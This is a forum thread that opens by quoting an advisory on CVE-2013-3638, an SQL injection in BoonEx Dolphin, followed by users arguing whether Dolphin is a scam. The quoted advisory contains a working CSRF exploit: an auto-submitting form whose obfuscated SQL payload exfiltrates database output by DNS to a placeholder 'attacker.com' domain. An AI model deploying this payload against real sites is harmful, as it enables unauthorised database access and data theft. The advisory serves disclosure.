SQL Injection in Dolphin: CVE-2013-3638
The vulnerability exists due to insufficient validation of "pathes[]" HTTP POST parameter passed to "/administration/categories.php" PHP script. A remote authenticated administrator can execute arbitrary SQL commands in the application's database.
This vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in application administrator to visit a web page with CSRF exploit.
The basic CSRF exploit code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The exploit will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):
<form action="http://[host]/administration/categories.php" method="post" name="main">
<input type="hidden" name="pathes[]" value="1%%(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHA R(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(1 11),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- %%1">
<input type="hidden" name="action_disable" value="1">
<input type="submit" id="btn">
</form>
<script>
document.main.submit();
</script>
is that true??
frankly, I want to buy BoonEx dolphin, but I am so hesitant with all the news .. I have seen hundreds of news story about dolphin BoonEx is a scam. Can you convince me ???
|
If you read the CVE notes, you'll see this was fixed in Dolphin 7.1.3. Not to mention this requires admin access to work. BoonEx Certified Host: Zarconia.net - Fully Supported Shared and Dedicated for Dolphin |
You say you want convinced that boonex dolphin is not a scam? Well you see I am not one of the seasoned pro's and I haven't purchased a license at all. I use the software to run a small social network. I have no interest one way or the other as to what software others use.
However when it comes to bugs, all software has them. I have seen wordpress exploits that basically open up ones system - yet no one runs around calling wordpress a scam. Lord only knows anyone who has used a microsoft system has certainly been exposed to shotty code that can be exploited. Thats why they pt out so many updates and service packs every time they release a new software. My point is bugs don't make something a scam.
Now the truth is, most things of value, will have a backlash of haters that scream its a scam.It happens to most businesses that reach a certain level of awesomeness. Now mix that with the fact the first few versions of dolphin had a rocky start.... and you get tons of complainers swearing its a scam.
However if you look at the evidence, it doesn't support the claim of scam. Boonex dolphin is the single most used social networking software in existence. Its used by almost every dating site, and more than 50% of social sites (that are not mainstream custom build social sites) use dolphin. You doubt these numbers?
Do a simple search on google for "modules/boonex -dolphin.com" or for "modules/boonex/avatar -boonex.com" and you will see just how many sites actually use the software. You will find listings for colleges using the software, planet saved, parent finder, fishing buddies.... there are so many sites that use the software its impossible to list them all.
I BELIEVE dolphin is actually the number 3 webscript on the internet coming in 3rd to wordpress and joomla.
If its the price that makes people call it a scam, let me say boonex for what it offers is actually VERY CHEAP. Hell most quality marketers pay more than $200 a MONTH just for aweber to maintain a mailing list for them.
Go price the crappy yet simple scripts that exist out there. For example price the software if you want to setup something simple like a safelist or a traffic exchange. Those are softwares that can do one thing and one thing only and they cost as much as boonex dolphin (for example do a search for LFMTE or LFMVM) yet they can only be used for one thing. At least boonex can be configured countless ways and used to run any number of membership based sites, social network sites, or dating sites - and did I mention its 100% free?
You only have to pay (for 7.1.x) if you want the ads removed and proper support. Nothing stops anyone from downloading it, examining the code, and using it for free. THAT is NOT scam by any means - thats more of a "know what you are getting before you pay for it" type of issue.
In any event I hope this helps you see boonex, is not a scam by any stretch of the imagination. |
Furthermore, look at the dates on the "scam" claims. They are very outdated. Geeks, making the world a better place |
Do you even understand what a "scam" is? so much to do.... |
Proud Hosted by Zarconia.net |
Do you even understand what a "scam" is?
Parashank is your mod full width got updated lately ? just noticed change of update date to 07.05.15 and thought maybe was updated ...
Proud Hosted by Zarconia.net |
Do you even understand what a "scam" is?
Parashank is your mod full width got updated lately ? just noticed change of update date to 07.05.15 and thought maybe was updated ...
nop
so much to do.... |
Proud Hosted by Zarconia.net |
RE
frankly, I want to buy BoonEx dolphin, but I am so hesitant with all the news .. I have seen hundreds of news story about dolphin BoonEx is a scam. Can you convince me ???
Yeah... it's a textbook scam. Boonex provides a working software product that they've spent thousands of hours developing to you for a few hundred dollars. What a fckn ripoff!
My opinions expressed on this site, in no way represent those of Boonex or Boonex employees. |
